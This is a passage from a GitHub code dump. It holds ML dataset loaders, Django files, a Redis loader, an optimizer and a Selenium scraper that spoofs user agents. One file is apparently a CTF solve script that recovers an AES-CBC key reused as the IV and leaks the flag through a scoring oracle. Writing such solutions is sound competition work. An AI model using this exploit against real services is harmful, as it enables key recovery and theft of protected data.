"utils.folder_check", "line_number": 169, "usage_type": "call"}, {"api_name": "utils.save_npz", "line_number": 172, "usage_type": "call"}, {"api_name": "utils.save_npz", "line_number": 173, "usage_type": "call"}, {"api_name": "utils.save_pkl", "line_number": 174, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 180, "usage_type": "call"}, {"api_name": "utils.file_to_list", "line_number": 187, "usage_type": "call"}]} +{"seq_id": "7251090211", "text": "import redis\nimport json\n\nr = redis.Redis(host='localhost', port=6378, db=0)\n\nwith open('artist.json', 'r') as fp:\n i = 1\n for line in fp:\n artist = json.loads(line)\n key = '%s-%d' % (artist['name'], artist['id'])\n r.hset(key, 'id', artist['id'])\n r.hset(key, 'name', artist['name'])\n r.hset(key, 'area', artist.get('area', ''))\n print('[%d] %s Inserted' % (i, artist['name']))\n i += 1\n", "repo_name": "aki202/nlp100", "sub_path": "chapter7/060.py", "file_name": "060.py", "file_ext": "py", "file_size_in_byte": 409, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "redis.Redis", "line_number": 4, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 9, "usage_type": "call"}]} +{"seq_id": "36992257576", "text": "from torch.utils.data import TensorDataset, DataLoader\nimport torch\nimport numpy as np\nimport os\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import StandardScaler\nimport json\nfrom config.config import config\n\ndef standardize_data(data):\n return (data - data.mean(dim=0))/data.std(dim=0)\n\ndef mnist_torch_dataset(batch_size, full_dataset: bool, classes_subset=None):\n '''\n :param batch_size: \n :param full_dataset - if True, the dataloader will load the full dataset, batch_size ignored \n :return: \n '''\n \n default_path = config[\"default_data_path\"]\n train_dataset_path = os.path.join(default_path, 'mnist/pytorch/train_mnist.pth')\n test_dataset_path = os.path.join(default_path, 'mnist/pytorch/test_mnist.pth')\n\n train_data, train_labels = torch.load(train_dataset_path)\n test_data, test_labels = torch.load(test_dataset_path)\n train_data = 
train_data.div_(255.).reshape((train_data.shape[0],-1))\n test_data = test_data.div_(255.).reshape((test_data.shape[0],-1))\n if classes_subset is None:\n train_dataset = TensorDataset(train_data, train_labels)\n test_dataset = TensorDataset(test_data, test_labels)\n output_dim = 10\n else:\n tr_indices = np.isin(torch.argmax(train_labels,dim=1), classes_subset).nonzero()[0]\n tst_indices = np.isin(torch.argmax(test_labels,dim=1), classes_subset).nonzero()[0]\n train_dataset = TensorDataset(train_data[tr_indices,...], train_labels[tr_indices,:][:,classes_subset])\n test_dataset = TensorDataset(test_data[tst_indices,...], test_labels[tst_indices,:][:,classes_subset])\n output_dim = len(classes_subset)\n\n return train_dataset, test_dataset, 784, output_dim\n\ndef general_torch_dataset(dataset_name, standardise, standardise_labels=False, random_state=0):\n '''\n :param batch_size: \n :param full_dataset - if True, the dataloader will load the full dataset, batch_size ignored \n :return: \n '''\n \n default_path = config[\"default_data_path\"]\n \n datasets = os.listdir(default_path)\n if dataset_name not in datasets:\n print(\"Dataset is not available\")\n print(datasets)\n raise ValueError() \n \n path_to_dataset_dir = os.path.join(default_path, dataset_name, 'pytorch')\n # if len(os.listdir(path_to_dataset_dir)) == 2:\n # train_dataset_path = os.path.join(path_to_dataset_dir, 'train_%s.pth' %dataset_name)\n # test_dataset_path = os.path.join(path_to_dataset_dir, 'test_%s.pth' %dataset_name)\n\n # train_data, train_labels = torch.load(train_dataset_path)\n # test_data, test_labels = torch.load(test_dataset_path)\n \n # else:\n dataset_path = os.path.join(path_to_dataset_dir, '%s.pth' %dataset_name)\n data, labels = torch.load(dataset_path)\n if standardise:\n data = standardize_data(data)\n \n if standardise_labels:\n scaler = StandardScaler()\n if train_labels.ndim == 1:\n train_labels = train_labels.reshape(-1,1)\n test_labels = test_labels.reshape(-1,1)\n \n train_labels = torch.Tensor(scaler.fit_transform(train_labels))\n test_labels = torch.Tensor(scaler.transform(test_labels))\n \n train_data, test_data, train_labels, test_labels = train_test_split(data,labels, test_size=0.2, random_state=random_state)\n \n train_dataset = TensorDataset(train_data, train_labels)\n test_dataset = TensorDataset(test_data, test_labels)\n\n if (len(train_data.shape) != 2) or (len(train_labels.shape) != 2):\n raise ValueError('This loader is not suitable from this dataset') \n input_dim = train_data.shape[1]\n output_dim = train_labels.shape[1]\n return train_dataset, test_dataset, input_dim, output_dim\n\n\ndef linearly_separable_data(n_train_points, n_test_points, onehot=False):\n x_train = np.random.rand(n_train_points, 2) - 0.5\n x_test = np.random.rand(n_test_points, 2) - 0.5\n y_train = np.apply_along_axis(lambda x: int(x[0] < x[1]), axis=1, arr=x_train)\n y_test = np.apply_along_axis(lambda x: int(x[0] < x[1]), axis=1, arr=x_test)\n\n if onehot:\n y_train = np.eye(2)[y_train]\n y_test = np.eye(2)[y_test]\n\n train_dataset = TensorDataset(torch.Tensor(x_train), torch.Tensor(y_train))\n test_dataset = TensorDataset(torch.Tensor(x_test), torch.Tensor(y_test))\n \n train_dataloader = DataLoader(train_dataset,\n batch_size=n_train_points,\n shuffle=True,\n num_workers=0,\n pin_memory=False)\n \n test_dataloader = DataLoader(test_dataset,\n batch_size=n_train_points,\n shuffle=True,\n num_workers=0,\n pin_memory=False)\n\n \n return train_dataloader, test_dataloader\n \ndef 
synthetic_regression_problem(train_len, noise_level=0.1):\n '''\n Implements Doppler function from \n\n Wasserman, Larry. All of nonparametric statistics. Springer Science & Business Media, 2006.\n Eq. (5.64)\n '''\n x = np.linspace(0,1,1000)\n func = lambda x: np.sqrt(x*(1-x)) * np.sin(2.1*np.pi/(x+0.05))\n train_idx = sorted(np.random.choice(range(len(x)), train_len, replace=False))\n x_train = x[train_idx]\n y_train =(func(x_train) + np.random.randn(len(x_train))*noise_level)\n return x_train.reshape(-1,1), y_train, func", "repo_name": "bkozyrskiy/Local_GP", "sub_path": "datasets.py", "file_name": "datasets.py", "file_ext": "py", "file_size_in_byte": 5509, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "config.config.config", "line_number": 20, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path", "line_number": 22, "usage_type": "attribute"}, {"api_name": "torch.load", "line_number": 24, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 25, "usage_type": "call"}, {"api_name": "torch.utils.data.TensorDataset", "line_number": 29, "usage_type": "call"}, {"api_name": "torch.utils.data.TensorDataset", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.isin", "line_number": 33, "usage_type": "call"}, {"api_name": "torch.argmax", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.isin", "line_number": 34, "usage_type": "call"}, {"api_name": "torch.argmax", "line_number": 34, "usage_type": "call"}, {"api_name": "torch.utils.data.TensorDataset", "line_number": 35, "usage_type": "call"}, {"api_name": "torch.utils.data.TensorDataset", "line_number": 36, "usage_type": "call"}, {"api_name": "config.config.config", "line_number": 48, "usage_type": "name"}, {"api_name": "os.listdir", "line_number": 50, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 56, "usage_type": "call"}, {"api_name": "os.path", "line_number": 56, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 65, "usage_type": "call"}, {"api_name": "os.path", "line_number": 65, "usage_type": "attribute"}, {"api_name": "torch.load", "line_number": 66, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 71, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 76, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 77, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 79, "usage_type": "call"}, {"api_name": "torch.utils.data.TensorDataset", "line_number": 81, "usage_type": "call"}, {"api_name": "torch.utils.data.TensorDataset", "line_number": 82, "usage_type": "call"}, {"api_name": "numpy.random.rand", "line_number": 92, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 92, "usage_type": "attribute"}, {"api_name": "numpy.random.rand", "line_number": 93, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 93, "usage_type": "attribute"}, {"api_name": "numpy.apply_along_axis", "line_number": 94, "usage_type": "call"}, {"api_name": "numpy.apply_along_axis", "line_number": 95, "usage_type": "call"}, {"api_name": "numpy.eye", "line_number": 98, "usage_type": "call"}, {"api_name": "numpy.eye", "line_number": 99, "usage_type": "call"}, {"api_name": 
"torch.utils.data.TensorDataset", "line_number": 101, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 101, "usage_type": "call"}, {"api_name": "torch.utils.data.TensorDataset", "line_number": 102, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 102, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 104, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 110, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 126, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 127, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 127, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 127, "usage_type": "attribute"}, {"api_name": "numpy.random.choice", "line_number": 128, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 128, "usage_type": "attribute"}, {"api_name": "numpy.random.randn", "line_number": 130, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 130, "usage_type": "attribute"}]} +{"seq_id": "25013606746", "text": "import os\nimport re\n\nfrom setuptools import setup # type: ignore\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\n\ndef version():\n version_pattern = r\"__version__\\W*=\\W*\\\"([^\\\"]+)\\\"\"\n src = os.path.join(os.path.dirname(__file__), 'aiohec/__init__.py')\n with open(src, 'r') as f:\n (v,) = re.findall(version_pattern, f.read())\n return v\n\n\nsetup(\n name='aiohec',\n version=version(),\n author='Marcus LaFerrera',\n author_email='mlaferrera@splunk.com',\n description='An async Splunk module for Getting Data In (GDI)',\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n license='Apache License 2.0',\n url='https://github.com/splunk/aiohec',\n include_package_data=True,\n packages=['aiohec'],\n install_requires=open('requirements.txt').read().split(),\n keywords='splunk',\n python_requires='>=3.7',\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'Intended Audience :: Information Technology',\n 'Intended Audience :: Developers',\n 'Intended Audience :: System Administrators',\n 'Topic :: Utilities',\n 'License :: OSI Approved :: Apache Software License',\n 'Programming Language :: Python :: 3.7',\n 'Programming Language :: Python :: 3.8',\n 'Programming Language :: Python :: 3.9',\n ],\n)\n", "repo_name": "splunk/aiohec", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 1366, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.path.join", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 12, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 14, "usage_type": "call"}, {"api_name": "setuptools.setup", "line_number": 18, "usage_type": "call"}]} +{"seq_id": "23934074903", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('core', '0005_auto_20150525_0009'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='prueba',\n name='testAuth',\n field=models.ForeignKey(verbose_name=b'Realizada por', to=settings.AUTH_USER_MODEL),\n ),\n migrations.AlterField(\n model_name='prueba',\n name='testId',\n 
field=models.IntegerField(verbose_name=b'Id prueba'),\n ),\n ]\n", "repo_name": "OviLuis/CasosDePrueba", "sub_path": "core/migrations/0006_auto_20150525_0209.py", "file_name": "0006_auto_20150525_0209.py", "file_ext": "py", "file_size_in_byte": 648, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.db.migrations.Migration", "line_number": 8, "usage_type": "attribute"}, {"api_name": "django.db.migrations", "line_number": 8, "usage_type": "name"}, {"api_name": "django.db.migrations.AlterField", "line_number": 15, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 15, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 18, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 18, "usage_type": "name"}, {"api_name": "django.conf.settings.AUTH_USER_MODEL", "line_number": 18, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 18, "usage_type": "name"}, {"api_name": "django.db.migrations.AlterField", "line_number": 20, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 20, "usage_type": "name"}, {"api_name": "django.db.models.IntegerField", "line_number": 23, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 23, "usage_type": "name"}]} +{"seq_id": "5698895646", "text": "# Baekjoon Online Judge - 14267번. 회사 문화 1\n\nfrom collections import deque\n\n\nN, M = map(int, input().split())\nboss = [0] + list(map(int, input().split())) # 1번이 사장(직원 N명의 직속 상사 번호)\n\nW = [0] * (N + 1) # 칭찬 수치\n\nfor _ in range(M):\n i, w = map(int, input().split())\n W[i] += w\n\njuniors = [[] for _ in range(N + 1)] # 각 직원의 부하직원들 리스트\nfor i in range(2, N + 1):\n juniors[boss[i]].append(i)\n\nq = deque([1]) # 1번부터 출발\nwhile q:\n senior = q.popleft()\n for junior in juniors[senior]:\n # 현재 상사의 칭찬 값을 부하직원에게 더해준다.\n W[junior] += W[senior]\n q.append(junior)\nprint(*W[1:])\n", "repo_name": "wnstj-yang/Algorithm", "sub_path": "BOJ/BOJ_14267.py", "file_name": "BOJ_14267.py", "file_ext": "py", "file_size_in_byte": 709, "program_lang": "python", "lang": "ko", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "collections.deque", "line_number": 19, "usage_type": "call"}]} +{"seq_id": "19535247028", "text": "#!/usr/bin/env python3\nfrom pwn import *\nfrom Crypto.Cipher import AES\n\ndef pad(msg, length=16):\n n = (-len(msg)) % length\n return msg + bytes([0]*n)\n\ndef sendmsg(msg):\n r.sendlineafter(b\"ata to be decrypted:\\n\", msg.hex().encode())\n r.readuntil(b\"Your decrypted data is \")\n ct = bytes.fromhex(r.readline()[:-1].decode())\n r.readuntil(b\"Your data is \")\n score = float(r.readuntil(b\"%\")[:-1])\n r.readline()\n return ct, score/100.0*len(ct)*8.0\n\ndef decrypt(msg, key):\n return AES.new(key, AES.MODE_CBC, iv=key).decrypt(msg)\n\ndef encrypt(msg, key):\n return AES.new(key, AES.MODE_CBC, iv=key).encrypt(msg)\n\ndef score_me(flag, byte):\n ct = pad(flag + bytes([byte]))\n _, score1 = sendmsg(ct)\n _, score2 = sendmsg(ct + zero_ct)\n return score2 - score1\n\nr = remote(\"127.0.0.1\", 50000)\n#r = process(\"./local-service.py\", stderr=2)\n\n# Get the iv / key\nct = b\"A\"*32\npt, _ = sendmsg(ct)\nkey = xor(ct[:16], pt[16:], pt[:16])\nassert decrypt(ct, key) == pt\n\nzero_ct = AES.new(key, AES.MODE_ECB).encrypt(b\"\\x00\"*16)\nassert AES.new(key, AES.MODE_ECB).decrypt(zero_ct) == b\"\\x00\"*16\n\n# Random assertion\npt, score = 
sendmsg(zero_ct*2)\nassert pt[:16] == key and pt[16:] == zero_ct\n\nflag = b\"\"\nwhile True:\n byte = 0\n for i in range(8):\n s1 = score_me(flag, byte | (1 << i))\n s2 = score_me(flag, byte)\n if s1 > s2:\n byte |= (1 << i)\n print(\"i:\", i, s1, s2, int(s1 > s2), flag + bytes([byte]))\n flag += bytes([byte])\n try:\n print(flag.decode())\n except:\n print(flag)\nprint(flag.decode())\n\nr.interactive()\n", "repo_name": "Kodsport/sakerhetssm-2023-solutions", "sub_path": "kval/crypto/CyBerCrime/solve-mkg/solve.py", "file_name": "solve.py", "file_ext": "py", "file_size_in_byte": 1595, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "Crypto.Cipher.AES.new", "line_number": 19, "usage_type": "call"}, {"api_name": "Crypto.Cipher.AES", "line_number": 19, "usage_type": "name"}, {"api_name": "Crypto.Cipher.AES.MODE_CBC", "line_number": 19, "usage_type": "attribute"}, {"api_name": "Crypto.Cipher.AES.new", "line_number": 22, "usage_type": "call"}, {"api_name": "Crypto.Cipher.AES", "line_number": 22, "usage_type": "name"}, {"api_name": "Crypto.Cipher.AES.MODE_CBC", "line_number": 22, "usage_type": "attribute"}, {"api_name": "Crypto.Cipher.AES.new", "line_number": 39, "usage_type": "call"}, {"api_name": "Crypto.Cipher.AES", "line_number": 39, "usage_type": "name"}, {"api_name": "Crypto.Cipher.AES.MODE_ECB", "line_number": 39, "usage_type": "attribute"}, {"api_name": "Crypto.Cipher.AES.new", "line_number": 40, "usage_type": "call"}, {"api_name": "Crypto.Cipher.AES", "line_number": 40, "usage_type": "name"}, {"api_name": "Crypto.Cipher.AES.MODE_ECB", "line_number": 40, "usage_type": "attribute"}]} +{"seq_id": "6473594125", "text": "from django.urls import path\nfrom django.conf.urls import url\nfrom .api import JogadorView, JogadorRegistrationView, RankingView, JogadorUpdateView, OneUserView\n\nurlpatterns = [\n path('registration/', JogadorRegistrationView.as_view(), name=\"jogador-create\"),\n path('update/', JogadorUpdateView.as_view(), name=\"jogador-update\"),\n path('ranking/', RankingView.as_view(), name=\"ranking\"),\n path('', JogadorView.as_view(), name=\"jogadores\"),\n url(r'^(?P\\d+)/$', OneUserView.as_view(), name='jogador'),\n]", "repo_name": "TCC-CIMATEC/TCC-BACK", "sub_path": "jogador/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 520, "program_lang": "python", "lang": "pt", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.urls.path", "line_number": 6, "usage_type": "call"}, {"api_name": "api.JogadorRegistrationView.as_view", "line_number": 6, "usage_type": "call"}, {"api_name": "api.JogadorRegistrationView", "line_number": 6, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "api.JogadorUpdateView.as_view", "line_number": 7, "usage_type": "call"}, {"api_name": "api.JogadorUpdateView", "line_number": 7, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "api.RankingView.as_view", "line_number": 8, "usage_type": "call"}, {"api_name": "api.RankingView", "line_number": 8, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "api.JogadorView.as_view", "line_number": 9, "usage_type": "call"}, {"api_name": "api.JogadorView", "line_number": 9, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 10, "usage_type": "call"}, {"api_name": 
"api.OneUserView.as_view", "line_number": 10, "usage_type": "call"}, {"api_name": "api.OneUserView", "line_number": 10, "usage_type": "name"}]} +{"seq_id": "9380271068", "text": "from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.edge.options import Options as EdgeOptions\nfrom datetime import datetime, timedelta\nfrom webdriver_manager.microsoft import EdgeChromiumDriverManager\nfrom selenium.webdriver.edge.service import Service as EdgeService\nfrom selenium.webdriver.common.by import By\nfrom fake_useragent import UserAgent\nfrom pprint import pprint\nimport selenium.common.exceptions\nimport time\nimport json\nimport logging\nfrom datetime import datetime, timezone\n\nfrom bs4 import BeautifulSoup\n\n\nlogging.basicConfig(filename=\"errorlogs.log\", level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\n\ndef User():\n\n ua = UserAgent()\n return ua.random\n\n\ndef makeTest(name: str, price: float, description: str):\n return {\n \"name\": str(name),\n \"price\": price,\n \"description\": str(description),\n }\n\n\nedge_options = EdgeOptions()\noptions = [\n \"--headless\",\n \"--disable-gpu\",\n \"--window-size=1920,1200\",\n \"--ignore-certificate-errors\",\n \"--disable-extensions\",\n \"--no-sandbox\",\n \"--disable-dev-shm-usage\"\n]\n\nfor option in options:\n edge_options.add_argument(option)\nedge_options.add_argument(f'user-agent={User()}')\nedge_options.add_experimental_option('excludeSwitches', ['enable-logging'])\n\nbrowser = webdriver.Edge(service=EdgeService(\n EdgeChromiumDriverManager().install()), options=edge_options)\n\nurl = \"https://pharmeasy.in/diagnostics/all-tests\"\nbrowser.get(url)\n\n# creating array\ndata = []\n\ntry:\n # waiting and scrolling in page\n current_scroll_position, new_height= 0, 1\n speed = 20\n while current_scroll_position <= new_height:\n current_scroll_position += speed\n browser.execute_script(\"window.scrollTo(0, {});\".format(current_scroll_position))\n new_height = browser.execute_script(\"return document.body.scrollHeight\")\n\n # getting all the tests\n tests = browser.find_element(\"xpath\", r'//*[@id=\"content-container\"]/div[1]/div')\n all_tests = tests.find_elements(By.TAG_NAME, \"a\")\n print(len(all_tests))\n\n for test in all_tests:\n # open link in new tab\n url = test.get_attribute(\"href\")\n\n browser.execute_script(\"window.open('');\")\n browser.switch_to.window(browser.window_handles[1])\n browser.get(url)\n \n test_info = browser.find_element(\"xpath\", r'//*[@id=\"content-container\"]/div[1]')\n number_of_elements = len(test_info.find_elements(By.TAG_NAME, \"div\"))\n\n # getting name and price\n name = browser.find_element(\"xpath\", r'//*[@id=\"content-container\"]/div[1]/div[2]/div[1]/div/div[1]/h1').text\n try:\n price = browser.find_element(\"xpath\", r'//*[@id=\"content-container\"]/div[1]/div[2]/div[1]/div/div[3]').text\n except:\n price = browser.find_element(\"xpath\", r'//*[@id=\"content-container\"]/div[1]/div[2]/div[1]/div/div[2]').text\n\n price = price.replace(\"₹\", \"\")\n price = price.replace(\",\", \"\")\n price = int(price.split()[0])\n\n description = browser.find_element(By.CLASS_NAME, '_32yDO').text\n \n\n browser.close()\n\n # creating test object\n test = makeTest(name, price, description)\n data.append(test)\n json.dump(data, open(\"json/tests.json\", \"w\"), indent=2)\n browser.switch_to.window(browser.window_handles[0])\n\n\n\n\nexcept Exception as e:\n 
print(\"UNEXPECTED ERROR OCCURED\")\n logger.info(\"Something terrible happened\")\n logger.exception(e)\n logger.info(\"\\n\")\nfinally:\n browser.quit()\n logger.info(\"End time : \" + str(datetime.now()))\n", "repo_name": "Caffeinated-Typists/DrugVeda", "sub_path": "data/test_scraper.py", "file_name": "test_scraper.py", "file_ext": "py", "file_size_in_byte": 3682, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "logging.basicConfig", "line_number": 20, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 20, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 21, "usage_type": "call"}, {"api_name": "fake_useragent.UserAgent", "line_number": 26, "usage_type": "call"}, {"api_name": "selenium.webdriver.edge.options.Options", "line_number": 38, "usage_type": "call"}, {"api_name": "selenium.webdriver.Edge", "line_number": 54, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 54, "usage_type": "name"}, {"api_name": "selenium.webdriver.edge.service.Service", "line_number": 54, "usage_type": "call"}, {"api_name": "webdriver_manager.microsoft.EdgeChromiumDriverManager", "line_number": 55, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.by.By.TAG_NAME", "line_number": 74, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 74, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.TAG_NAME", "line_number": 86, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 86, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CLASS_NAME", "line_number": 99, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 99, "usage_type": "name"}, {"api_name": "json.dump", "line_number": 107, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 120, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 120, "usage_type": "name"}]} +{"seq_id": "7357358654", "text": "from collections import OrderedDict\nimport numpy as np\nimport os\nimport shutil\nimport time\nimport multiprocessing as mp\n\ndef grad(f,x,dx,central,pool):\n n = len(x)\n\n if central:\n argslist = []\n for i in range(n):\n dx_v = np.zeros((n,1))\n dx_v[i] = dx\n argslist.append(x-dx_v)\n argslist.append(x+dx_v)\n else:\n argslist = []\n for i in range(n):\n dx_v = np.zeros((n,1))\n dx_v[i] = dx\n argslist.append(x+dx_v)\n argslist.append(x)\n\n results = pool.map(f,argslist)\n\n gradient = np.zeros((n,1))\n if central:\n for i in range(n):\n gradient[i] = (results[2*i+1]-results[2*i])/(2*dx)\n else:\n for i in range(n):\n gradient[i] = (results[i]-results[-1])/dx\n return gradient\n\nclass Settings:\n \"\"\"Contains settings used by optimizer\"\"\"\n\n def __init__(self,**kwargs):\n\n # Objective function args\n self.args = kwargs.get(\"args\",())\n\n # General args\n self.method = kwargs.get(\"method\")\n self.termination_tol = kwargs.get(\"termination_tol\",1e-9)\n self.grad_tol = kwargs.get(\"grad_tol\",1e-9)\n self.verbose = kwargs.get(\"verbose\",False)\n self.central_diff = kwargs.get(\"central_diff\",True)\n self.file_tag = kwargs.get(\"file_tag\",\"\")\n self.max_processes = kwargs.get(\"max_processes\",1)\n self.dx = kwargs.get(\"dx\",0.01)\n self.max_iterations = kwargs.get(\"max_iterations\",np.inf)\n self.num_avg = kwargs.get(\"num_avg\",1)\n\n self.use_finite_diff = kwargs.get(\"jac\") == None\n\n # 
BFGS args\n self.n_search = kwargs.get(\"n_search\",8)\n self.alpha_d = kwargs.get(\"default_alpha\",None)\n self.alpha_mult = kwargs.get(\"alpha_mult\",self.n_search-1)\n self.search_type = kwargs.get(\"line_search\",\"bracket\")\n self.rsq_tol = kwargs.get(\"rsq_tol\",0.8)\n self.wolfe_armijo = kwargs.get(\"wolfe_armijo\",1e-4)\n self.wolfe_curv = kwargs.get(\"wolfe_curv\",0.9)\n self.hess_init = kwargs.get(\"hess_init\",1.0)\n\n if self.wolfe_curv < self.wolfe_armijo:\n raise ValueError(\"Wolfe conditions improperly specified.\")\n\n # SQP args\n self.strict_penalty = kwargs.get(\"strict_penalty\",True)\n\n # GRG args\n self.cstr_tol = kwargs.get(\"cstr_tol\",1e-4)\n\n # Bounds and constraints\n bounds = kwargs.get(\"bounds\")\n constraints = kwargs.get(\"constraints\")\n\n # Assign method if not specified\n if self.method == None:\n if (bounds != None or constraints != None):\n self.method = \"sqp\"\n else:\n self.method = \"bfgs\"\n\n #Check for issues\n if self.method == \"bgfs\" and (bounds != None or constraints != None):\n raise ValueError(\"Bounds or constraints may not be specified for the simple BGFS algorithm.\")\n\nclass OptimizerResult:\n \"\"\"Return data from the 'minimize' function\"\"\"\n\n def __init__(self,f,x,success,message,iterations,obj_calls,cstr_calls=[]):\n self.f = f\n self.x = x\n self.success = success\n self.message = message\n self.total_iter = iterations\n self.obj_calls = obj_calls\n self.cstr_calls = cstr_calls\n\nclass Constraint:\n \"\"\"Class defining a constraint\"\"\"\n eval_calls = mp.Value('i',0)\n \n def __init__(self,cstr_type,f,pool,queue,settings,**kwargs):\n self.args = kwargs.get(\"args\",())\n self.type = cstr_type\n self.fun = f\n self.gr = kwargs.get(\"grad\")\n self.central_diff = settings.central_diff\n self.max_processes = settings.max_processes\n self.dx = settings.dx\n self.pool = pool\n self.queue = queue\n with self.eval_calls.get_lock():\n self.eval_calls.value = 0\n \n def g(self,x):\n with self.eval_calls.get_lock():\n self.eval_calls.value += 1\n return self.fun(x,*self.args)\n\n def del_g(self,x):\n if self.gr == None:\n return grad(self.g,x,self.dx,self.central_diff,self.pool)\n else:\n return self.gr(x)\n\n def __getstate__(self):\n self_dict = self.__dict__.copy()\n del self_dict['pool']\n return self_dict\n\n def __setstate__(self, state):\n self.__dict__.update(state)\n\nclass Objective:\n \"\"\"Class defining objective function\"\"\"\n eval_calls = mp.Value('i',0)\n\n def __init__(self,f,pool,queue,settings,**kwargs):\n self.args = settings.args\n self.fun = f\n self.gr = kwargs.get(\"grad\")\n self.hess = kwargs.get(\"hess\")\n self.central_diff = settings.central_diff\n self.max_processes = settings.max_processes\n self.dx = settings.dx\n self.num_avg = settings.num_avg\n self.pool = pool\n self.queue = queue\n with self.eval_calls.get_lock():\n self.eval_calls.value = 0\n\n def f(self,x):\n n = len(x)\n f_val = 0.0\n for i in range(self.num_avg):\n f_val += np.asscalar(self.fun(x,*self.args))\n with self.eval_calls.get_lock():\n self.eval_calls.value += 1\n msg = \"{0:>20}\".format(f_val)\n for value in x:\n msg += \", {0:>20}\".format(np.asscalar(value))\n self.queue.put(msg)\n return f_val/self.num_avg\n\n def del_f(self,x):\n if self.gr == None:\n return grad(self.f,x,self.dx,self.central_diff,self.pool)\n else:\n return self.gr(x)\n\n def __getstate__(self):\n self_dict = self.__dict__.copy()\n del self_dict['pool']\n return self_dict\n\n def __setstate__(self, state):\n self.__dict__.update(state)\n\n\nclass 
